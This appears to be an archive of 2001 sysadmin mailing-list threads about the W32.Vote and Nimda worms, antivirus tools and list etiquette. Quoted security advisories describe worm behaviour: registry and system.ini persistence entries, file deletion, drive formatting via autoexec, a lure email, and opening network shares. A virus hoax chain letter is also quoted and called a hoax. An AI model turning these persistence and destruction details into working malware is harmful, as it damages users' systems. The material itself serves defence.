Deletes files: After reboot, the worm attempts to delete all files in the Windows folder
Modifies files: All files with the extension htm or html will be overwritten.
Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer.

Distribution:
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Technical description:
W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace!
Attachment: WTC.EXE

Next, the worm will insert two .vbs files on the system:
\Windows folder\ZaCker.vbs
\Windows\System folder\MixDaLaL.vbs

In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm
RE: Another F(*^ virus! (OT)
Again, not a problem here. They all logout, and they all shutdown. If they don't for some reason, it shows up on the Panda Administrator screen, and I log them off myself. Hasn't been that big a problem here, but I've only got 50 users.

-----Original Message-----
From: Randal, Phil [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 7:45 AM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus! (OT)

Sorry to be pedantic, but a login script is a pull, not a push, and if your users habitually don't log out the login script ain't going to get run in a hurry.

Phil
-
Phil Randal
Network Engineer
Herefordshire Council
Hereford, UK

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: 25 September 2001 15:01
To: NT System Admin Issues
Subject: RE: Another F(*^ virus! (OT)

I haven't worked with any of the other packages, so I can't compare. It seems to do ok, although they don't have any "ALERT" system, and always seem to be the last to get a definition out. I still don't know if they have the Vote virus covered. They automatically create a logon script to push the defs to the desktop, so as long as you make sure the server gets updated before everyone logs on it works fine. Our work hours make this a non-issue. Remote users have a problem with the speed.

I do know that I gave up on active desktop scanning. It slowed my workstations down too much. I've been lucky that my folks get a lot of e-mail, but aren't big on downloading files. So I'm scanning Exchange and Outlook. Personally, I think way too many of the virii are being caught at the desktop rather than the Exchange server. They also have no filtering/blocking. As soon as I can free up some money I'll most likely dump the Panda for Exchange and get Sybari.
RE: Get Me Off the List, Please
tough

-----Original Message-----
From: Murray Freeman [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 8:56 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

You're correct sir,...but there is much too much noise on this list nonetheless. I can't tell you how many postings I deleted about the WTC disaster that had absolutely nothing to do with NTSYSADMIN. It can be very frustrating but there is good info to be gleaned from this list. I've contributed and I've been helped, but there's still too much noise.

Murray

-----Original Message-----
From: Dewar Charles R [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 10:46 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Name one.

-----Original Message-----
From: Andrew Blevins [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:52 AM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Looks like those of us who want off the list will have to set up an auto-delete rule. This list is so full of noise, it's not worth it. There are much more professional, and useful, lists out there.

-----Original Message-----
From: Darril Gibson [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 5:28 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Me too. It was advertised as a no noise list. Not so. In just a couple of hours, I have over 100 emails. I tried to get off, but the scripts on the web page don't allow it.

Darril R. Gibson ([EMAIL PROTECTED]) Director of Continuing Education MCT, MCSE, MCDBA, MCSD America's Computer Training Source 340-, Cell 328-9299

-----Original Message-----
From: Lucia, Steve [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 5:23 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Just for your info the script is not working!!! I too would like off this list

Steve J. Lucia ([EMAIL PROTECTED]) Sr. Network Specialist Client Server Group FFIOC 707-436-2840 co# 227-2840 pager 707-427-9176

-----Original Message-----
From: Don Ely [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:32 PM
To: NT System Admin Issues
Subject: RE: Get Me Off the List, Please

Get yourself off the list. The link is at the bottom of the email.

-----Original Message-----
From: Maas [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:18 PM
To: NT System Admin Issues
Cc: [EMAIL PROTECTED]
Subject: Get Me Off the List, Please

[EMAIL PROTECTED]

please remove the address above from the list server

thank you...in over my head here

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
RE: Another F(*^ virus! (OT)
I finally got it to autoupdate for Exchange. But as I said earlier, I'm still not sure if they have Vote in their defs, their website doesn't get updated quick enough and they don't send alerts.

-----Original Message-----
From: Hasan Dervish [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:19 AM
To: NT System Admin Issues
Subject: Re: Another F(*^ virus! (OT)

I use panda on BackOffice and BackOffice SBS the only problem I have seen its inability to fully autoupdate in sbs, and autoupdate exchange server in BackOffice.

----- Original Message -----
From: Miranda, Fausto [EMAIL PROTECTED]
To: NT System Admin Issues [EMAIL PROTECTED]
Sent: Tuesday, September 25, 2001 2:57 PM
Subject: RE: Another F(*^ virus! (OT)

dump it, I have never seen it work correctly.

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:21 AM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus! (OT)

A little off the topic here, but how do you find Panda? We use Norton AV for desktop and server protection, but have Panda for Lotus Notes protection (I think it's a good idea to have a double layer sometimes). Panda was suggested by our Notes Admin guy, and it has not worked correctly since! Currently it is only running on one of our 4 Notes servers, and I don't think it is doing too well there! I'm about ready to dump it, and have put Norton on the other Notes servers to make sure they are covered. Anyone else out there use Panda, and would actually recommend it?

G.

RZorz@ScottsdaleChamber.com
25/09/2001 13:51
Please respond to NT System Admin Issues
To: NT System Admin Issues [EMAIL PROTECTED]
cc:
Subject: RE: Another F(*^ virus!

Actually one of my users sent that to me. I use Panda, which of course once again seems to be the last to know.

-----Original Message-----
From: Danny Iaconetti [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:03 PM
To: NT System Admin Issues
Subject: RE: Another F(*^ virus!

According to SARC, updating your definitions will detect this worm. Although, the latest update I get is dated Sep. 20. What's the scoop?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 4:37 PM
To: NT System Admin Issues
Subject: Another F(*^ virus!

Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Symantec Security Response
http://securityresponse.symantec.com

W32.Vote.A@mm
Discovered on: September 24, 2001
Last Updated on: September 24, 2001 at 09:56:27 AM PDT

W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products.

Type: Worm
Infection Length: 55,808 Bytes
Virus Definitions: September 24, 2001

Threat Assessment:
Wild: Low
Damage: High
Distribution: High

Wild:
Number of infections: 0 - 49
Number of sites: 3 - 9
Geographical distribution: Medium
Threat containment: Moderate
Removal: Moderate

Damage:
Payload:
Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook
Deletes files: After reboot, the worm attempts to delete all files in the Windows folder
Modifies files: All files with the extension htm or html will be overwritten.
Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer.

Distribution:
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Technical description:
W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace!
Attachment: WTC.EXE

Next, the worm will insert two .vbs files on the system:
\Windows folder\ZaCker.vbs
\Windows\System folder\MixDaLaL.vbs

In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus. Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus.

What the dropped files do

MixDaLaL.vbs
MixDaLaL.vbs is a Visual Basic
RE: OT: MS Project 98
http://www.mvps.org/project/faqs.htm - 16. Project Viewer

Microsoft has not provided a viewer for Project. However, it is designed with the Web in mind, which allows anyone with an Internet Browser or email facilities to view details. For a picture, try clicking the copy picture button (little camera on the standard toolbar). There you have the option of creating a GIF file which can be used with the Save As... HTML format or directly attached to an email.

Save As HTML... give a file name and Save select an Export Map (or New Map) Edit Options tab check "Include image file in HTML page" insert path and name of GIF image.

[Project 2000 has Project Central which can display project information including graphical pages.]

-----Original Message-----
From: Sawatzke, Jeff [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 11:10 AM
To: NT System Admin Issues
Subject: RE: OT: MS Project 98

They could publish them as HTML files.

-----Original Message-----
From: Robert Toland [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 25, 2001 9:15 AM
To: NT System Admin Issues
Subject: Re: OT: MS Project 98

No, but if you come across one I'd be interested.

"Jolley Lee @Consult" wrote:

Dear All,

Sorry for the off topic question but I have hit a dead end. Our users are receiving MS Project 98 files from clients but we use a different package for project management. Does anybody know of a viewer for MS project files?

Thank you
Lee Jolley

This email transmission is confidential and intended for the addressee only. It may contain privileged and confidential information. If you are not the person or organisation to whom it is addressed, you must not copy, distribute, or take any action in reliance upon it. If you have received this message in error, please notify the [EMAIL PROTECTED] and return it. Carillion PLC Registered in England No. 3782379 Registered Office: Birch Street Wolverhampton WV1 4HY

This message has been checked for all known viruses by Star Internet delivered through the MessageLabs Virus Scanning Service. For further information visit http://www.star.net.uk/stats.asp or alternatively call Star Internet for details on the Virus Scanning Service.
RE: Nimda - Thought we were protected
You can't block attachments natively. You need 3rd party antivirus software.

-----Original Message-----
From: Kelly Gosh [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 11:07 AM
To: NT System Admin Issues
Subject: RE: Nimda - Thought we were protected

Where in Exchange 5.5 can you block certain attachments? Ideally, I would like to block all *.exe and all *.vbs from most users. I know how to block domains and email addresses, and I swear I've seen attachment blocking, but for the life of me I can't find it anywhere now! Any help would be appreciated.

Kelly Gosh Information Systems Manager Brilliance Audio, Inc. Phone: 616.846.5256 ext. 704 Fax: 616.846.0630 http://www.brillianceaudio.com

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 12:47 PM
To: NT System Admin Issues
Subject: RE: Nimda - Thought we were protected

SCAN ALL FILES (asp,js,htm,html,shtm,shtml,dll), do NOT use program files only! Replace riched20.dll and mcc.exe or you will be infected again after you reboot! (of course replace them with clean copies!)

Kind regards,
Pim Vessies CSO Backoffice Philips Medical Systems IM/CSO/BO Building QAII-441 Veenpluis 4 - 6, 5684 PC Best The Netherlands

"Steve Kelsay" [EMAIL PROTECTED] on 09/24/2001 05:11:25 PM
Please respond to "NT System Admin Issues" [EMAIL PROTECTED]
To: "NT System Admin Issues" [EMAIL PROTECTED]
cc: (bcc: Pim Vessies/BST/MS/PHILIPS)
Subject: RE: Nimda - Thought we were protected
Classification:

Yes, I had installed all the patches we discussed here on the site.

Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522

[EMAIL PROTECTED] 09/24/01 10:59AM

Did you have the IE patch applied? If they browsed to an infected site they can get the virus that way as well.

Robert Muncy Sherman Financial Group

-----Original Message-----
From: Steve Kelsay [mailto:[EMAIL PROTECTED]]
Sent: Monday, September 24, 2001 10:35 AM
To: NT System Admin Issues
Subject: Nimda - Thought we were protected

First alert, Maybe nothing. We just had our developer machines, running NT2000 Server hit with Nimda. The strange thing is, we have Nimda protection in our email scanner, and all the security fixes MS said should be applied. SP2 is installed. The machines boot up, a log in screen displays, and they login. The Novell login script begins to run as normal ( we run mixed network, NT and Novell), then the login script box clears as normal, a blue screen appears as normal, and nothing further happens. Could this be a new strain?

Steve Kelsay Network Administration Group South Carolina Department of Revenue 301 Gervais Street Columbia, SC 29201 (803) 898-5522

http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Another F(*^ virus!
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Symantec Security Response
http://securityresponse.symantec.com

W32.Vote.A@mm
Discovered on: September 24, 2001
Last Updated on: September 24, 2001 at 09:56:27 AM PDT

W32.Vote.A@mm is a mass-mailing worm that is written in Visual Basic. When executed, it will email itself out to all email addresses in the Microsoft Outlook address book. The worm will insert two .vbs files on the system, and it will also attempt to delete files from several antivirus products.

Type: Worm
Infection Length: 55,808 Bytes
Virus Definitions: September 24, 2001

Threat Assessment:
Wild: Low
Damage: High
Distribution: High

Wild:
Number of infections: 0 - 49
Number of sites: 3 - 9
Geographical distribution: Medium
Threat containment: Moderate
Removal: Moderate

Damage:
Payload:
Large scale e-mailing: Emails everyone in the Microsoft Outlook addressbook
Deletes files: After reboot, the worm attempts to delete all files in the Windows folder
Modifies files: All files with the extension htm or html will be overwritten.
Compromises security settings: If the Backdoor.Trojan was successfully downloaded and installed, anyone could gain full access to the computer.

Distribution:
Subject of email: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Name of attachment: WTC.exe
Size of attachment: 55808 Bytes

Technical description:
W32.Vote.A@mm is a mass-mailing worm written in the Visual Basic language. It requires the file Msvbvm50.dll to execute. When executed, the worm will attempt to email itself to all contacts in the Microsoft Outlook address book. The email will appear as follows.

Subject: Fwd:Peace BeTweeN AmeriCa and IsLaM!
Message: Hi iS iT A waR Against AmeriCa Or IsLaM !? Let's Vote To Live in Peace!
Attachment: WTC.EXE

Next, the worm will insert two .vbs files on the system:
\Windows folder\ZaCker.vbs
\Windows\System folder\MixDaLaL.vbs

In addition, the worm will attempt to download and execute a file. This file is detected as Backdoor.Trojan by Norton Antivirus.

Finally, the worm will attempt to delete all files from several folders. These folders appear to be the default installation folders for several antivirus products. For Norton AntiVirus, this worm will only attempt to delete the files if Norton Antivirus is located in C:\Program Files\Norton AntiVirus.

What the dropped files do

MixDaLaL.vbs
MixDaLaL.vbs is a Visual Basic Script file that is inserted in the \Windows\System folder. This file is executed by the worm. As the file is executed, it will look through all folders on all fixed drives and network drives for files with the extensions .htm or .html. If such files are found, they are overwritten with the message:

AmeRiCa ...Few Days WiLL Show You What We Can Do !!! It's Our Turn ZaCkEr is So Sorry For You

ZaCker.VBS
This file is inserted in the \Windows\System folder. It is not executed by the worm. Instead, the value
Norton.Thar \Windows\System\ZaCker.vbs
is added to the registry key
HKEY_LOCAL_MACHINE\Microsoft\Windows\CurrentVersion\Run
so that the file is executed when you start Windows.

When executed at the next restart, this file will attempt to delete all files in the \Windows folder. Next, the worm will create or overwrite the file C:\Autoexec.bat. Inside the file there will be a command that formats the C drive. The Autoexec.bat file is executed on Windows 95/98/Me and DOS systems when you start the computer. Finally, the worm will display the message

The worm does attempt to shut down Windows after the message has been displayed. However, because the files required for this event to occur have been deleted from the \Windows folder, the computer probably will not shut down.

Removal instructions:
1. Run LiveUpdate to make sure that you have the most recent virus definitions.
2. Start Norton AntiVirus (NAV), and make sure that NAV is configured to scan all files. For instructions on how to do this, read the document How to configure Norton AntiVirus to scan all files.
3. Run a full system scan.
4. Delete all files that are detected as W32.Vote.A@mm. If the worm has run and Norton AntiVirus is installed in C:\Program Files\Norton AntiVirus, you should reinstall Norton Antivirus.
5. If the computer has been rebooted after the infection, or if the computer seems very unstable, it is recommended that you reinstall the operating system.

Additional information:
If the Backdoor.Trojan was successfully installed on the computer, it is possible that your system has been accessed remotely by an unauthorized user. For this reason it is impossible to guarantee the integrity of a system that has had such an infection. The remote user could have made changes to your system, including but not limited to the following:
Stealing or changing passwords or password files
RE: How do you all do it?
This list didn't help me with Nimda as much as it did with ILOVEYOU. Fellow listers from all over the world started crashing, and I was able to handle it here with a brilliant low-tech solution - I printed a big warning out and put it on everyone's desktop. With only 50 users that was feasible, and because I'm in at least 2 hours earlier than anyone else. But this list saved the day!

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:29 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?

I was going to say that. There are some MAJOR advantages to being on these lists. As an example, many of us knew about Nimda hours before anyone else did. Granted we didn't have technical details or a name, but we knew there was something bad happening and to start battening down the hatches. You can't put a price on info like that. I guarantee you, you sub to these lists, your knowledge will grow exponentially, and you will look like a hero to your boss when you know the S*T is about to hit the fan well before anyone else does.

-----Original Message-----
From: Diane Beckham [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:26 PM
To: NT System Admin Issues
Subject: RE: How do you all do it?

Hey, this IS work. Knowing about a virus BEFORE users tell us, is major work

Diane

-----Original Message-----
From: Don Collier (Intermap Denver) [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:03 PM
To: NT System Admin Issues
Subject: How do you all do it?

I just joined this list today and am overwhelmed with email. Almost 200 messages today. How do you all keep up with this list and get any work done? (Not meant to imply anything)

Don Collier
Network Administrator
Intermap Technologies Inc.
Voice: 303-708-0955 x-207
Fax: 303-708-0952
[EMAIL PROTECTED]
www.intermaptechnologies.com
RE: WORST EVER VIRUS (CNN announced)
Hoax. see www.sophos.com. Of course, if I was going to create a virus, first thing I'd do is name it after one of the hoaxes.

-----Original Message-----
From: Sabrina Stolcz [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 1:18 PM
To: NT System Admin Issues
Subject: WORST EVER VIRUS (CNN announced)

WORST EVER VIRUS (CNN announced)
PLEASE SEND THIS TO EVERYONE ON YOUR CONTACT LIST!!

A new virus has just been discovered that has been classified by Microsoft as the most destructive ever! This virus was discovered yesterday afternoon by McAfee and no vaccine has yet been developed. This virus simply destroys Sector Zero from the hard disk, where vital information for its Functioning are stored.

This virus acts in the following manner: It sends itself automatically to all contacts on your list with the title A Virtual Card for You. As soon as the supposed virtual card is opened, the computer freezes so that the user has to reboot. When the ctrl+alt+del keys or the reset button are pressed, the virus destroys Sector Zero, thus permanently destroying the hard disk.

Yesterday in just a few hours this virus caused panic in New York, according to news broadcast by CNN. This alert was received by an employee of Microsoft itself. So don't open any mails with subject: A Virtual Card for You. As soon as you get the mail, delete it.

This email with all information contained herein or attached hereto may contain confidential and/or privileged information intended for the addressee(s) only. If you have received this email in error, please contact the sender and immediately delete this email in its entirety and any attachments thereto.
RE: Microsoft Has Nimda
I think all John was trying to point out is that of all companies, MS should be more on top of all this crap than anyone, since all too often we're having to connect to them to get patches/fixes/etc to fix vulnerabilities in their products. Weren't the MS sites we were connecting to get the Code Red security patches infected themselves? Wasn't there a problem with the Microsoft/Frontpage site caused by Nimda? That's some serious negligence on Microsoft's part.

-----Original Message-----
From: Dillon, Jeff [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 1:29 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda

Operant Conditioning 101: behavior is controlled by its consequences, but most IT depts are skilled at dodging those consequences (which reinforces THAT behavior), so nothing changes/improves. The problem that management has is determining whether any given admin crime is worthy of the death sentence, since a firing impacts morale and often requires a new (expensive) hire. I see two places where improvement could be made: 1) upgrade the multitude of admins (not fast or easy or cheap), or 2) upgrade the product's ability to keep ITSELF patched (which is Microsoft's baby). There seems to be a certain efficiency in #2.

-----Original Message-----
From: John Hornbuckle [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 4:10 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda

Some mistakes are worse than others. The worse the mistake, the harsher the punishment. Sometimes people need to be fired.

John Hornbuckle
Network Manager
Taylor County School District
318 North Clark Street
Perry, FL 32347

-----Original Message-----
From: Mal Sasalu [mailto:[EMAIL PROTECTED]]
Sent: Thursday, September 20, 2001 3:54 PM
To: NT System Admin Issues
Subject: RE: Microsoft Has Nimda

If firing someone or cutting off somebody's head for any mistake was an answer, you'd have heard bombs by now!
RE: Help for the Nimda virus
Yo John - how come all your responses are blank. Or is just me.

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:18 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 1:03 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Very useful tool. Thanks John.

You're welcome!

John

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:02 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:36 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

I find it ironic that I had to use Explorer Search to find Searchit.

Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer.

John Cesta

-----Original Message-----
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:29 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Mod the shortcut to point to the windows dir and it works fine.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

We appreciate the thought, but the tool does not install properly.

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 8:14 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:54 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

It also doesn't work. I downloaded and installed it, and it didn't even create an executable.

That's not true actually.
1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools.
2. The search.exe file is in the c:\winnt\system32 directory.
I didn't think it would be difficult to give something away. :0

John

-----Original Message-----
From: Givens, Mike [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:51 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

define free the link provided only goes to a trail version located in the downloads area ?

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:50 AM
To: NT System Admin Issues
Subject: Help for the Nimda virus

Previous email contained an incorrectly formatted URL. Try this one.

If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings you define. You can search for cmd.exe or tftp or any other piece of a virus or IIS exploit. SearchIt may be run via a scheduler and a report of the found files is emailed to you.

The FREE Download is at: http://www.serverautomationtools.com

John Cesta
RE: Help for the Nimda virus
Doh!!! I so rarely look down there unless someone responds "inline". Sorry

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 11:09 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Yo John - how come all your responses are blank. Or is just me.

Maybe because I am entering them under the question inline.

John

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 1:57 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Yo John - how come all your responses are blank. Or is just me.

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:18 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 1:03 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Very useful tool. Thanks John.

You're welcome!

John

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:02 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:36 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

I find it ironic that I had to use Explorer Search to find Searchit.

Yes, there is a glitch in the installer program we used. It works fine on NT4.0 but on Win2k it appends the setup path to the exe's install path. It's fairly easy to set the searchit.exe path to c:\winnt\system32\searchit.exe and it will be fine. We'll get that fixed as soon as we get the fix for the installer.

John Cesta

-----Original Message-----
From: Clark, Steve [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:29 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

Mod the shortcut to point to the windows dir and it works fine.

Steve Clark
Clark Systems Support, LLC
AVIEN Charter Member
www.clarksupport.com
301-610-9584 voice
240-465-0323 Efax

-----Original Message-----
From: Jim Busick [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 12:26 PM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

We appreciate the thought, but the tool does not install properly.

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 8:14 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

-----Original Message-----
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:54 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

It also doesn't work. I downloaded and installed it, and it didn't even create an executable.

That's not true actually.
1. It is FREE a production copy. The link is right on the home page to the right of the dancing tools.
2. The search.exe file is in the c:\winnt\system32 directory.
I didn't think it would be difficult to give something away. :0

John

-----Original Message-----
From: Givens, Mike [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 10:51 AM
To: NT System Admin Issues
Subject: RE: Help for the Nimda virus

define "free" the link provided only goes to a "trail" version located in the downloads area ?

-----Original Message-----
From: John Cesta - Lists [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 9:50 AM
To: NT System Admin Issues
Subject: Help for the Nimda virus

Previous email contained an incorrectly formatted URL. Try this one.

If any one is interested: We are giving away FREE our SearchIt program. SearchIt can search your logfiles, or any files, for text strings
RE: .BHF
from symantec.com

System Modifications

When executed the worm determines from where it is being executed. The worm then overwrites MMC.EXE in the Windows Directory or creates a copy of itself in the Windows Temporary Directory.

The worm then infects commonly used executables listed in the registry keys:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders

The worm hooks the system by modifying the system.ini file as follows:
Shell = explorer.exe load.exe -dontrunold

It also replaces the file Riched20.dll. Riched20.dll is a legitimate Windows .DLL used by applications such as Microsoft Word. By replacing this DLL, the worm is executed each time applications such as Microsoft Word are executed.

The worm copies itself as the file:
%Windows\System%\load.exe

NOTE: %Windows\System% is a variable. The worm locates the \Windows\System folder (by default this is C:\Windows\System) and copies itself to that location.

The worm then attempts to modify files with the extension .htm, .html, and .asp or filenames matching default, index, main and readme on the local system that are shared with other network computers. .EXE files are infected and .EML and .NWS files are replaced by the virus.

Next, the worm creates open network shares for all drives on the computer by modifying the registry key:
HKLM\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\[C$ - Z$]

A reboot of the computer is required for these settings to take effect.

The worm searches for all open shares on the network by iterating through the Network Neighborhood. All files on any open network shares are examined for possible infection. .EXE files are infected by the worm except WINZIP32.EXE. .EML and .NWS files are copied to the open network shares and the worm copies itself over as riched20.dll to any directory with .DOC files.

During execution, the worm may attempt to delete copies of itself. If the file is in use or locked, the worm will create WININIT.INI with an entry to delete itself upon reboot.

The worm contains bugs and can be resource intensive. Thus, not all actions may occur and system instability may be noticeable.

-----Original Message-----
From: David Coffey [mailto:[EMAIL PROTECTED]]
Sent: Wednesday, September 19, 2001 11:37 AM
To: NT System Admin Issues
Subject: .BHF

Hi everyone,

As most did we too got hit with the NIMDA virus. Has anyone experienced problems with Windows Explorer.exe after cleaning up your nt server? Also, I'm now getting a message at startup that says: Windows is searching for Connect from ouside.BHF. To locate the file yourself, click Browse. I can't find any information on this .bhf file and I am wondering if it's virus related. Lastly when I get the Dr. Watson for explorer.exe I also lose the Norton icon from the tray?

Thanks,
Dave
RE: Senate votes to permit warrantless Net-wiretaps, Carnivore use
As much as I don't necessarily have a problem with this, the real question will be what happens when someone makes an offhand, attempt-at-humor comment that sets off whatever filters they're looking for. Will my kid get put on a list because he's researching and chatting with friends about JFK's assassination and the phrase kill the president is in their conversation?

-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 5:50 AM
To: NT System Admin Issues
Subject: RE: Senate votes to permit warrantless Net-wiretaps, Carnivore use

Here here!

-----Original Message-----
From: Jerry Kennedy [mailto:[EMAIL PROTECTED]]
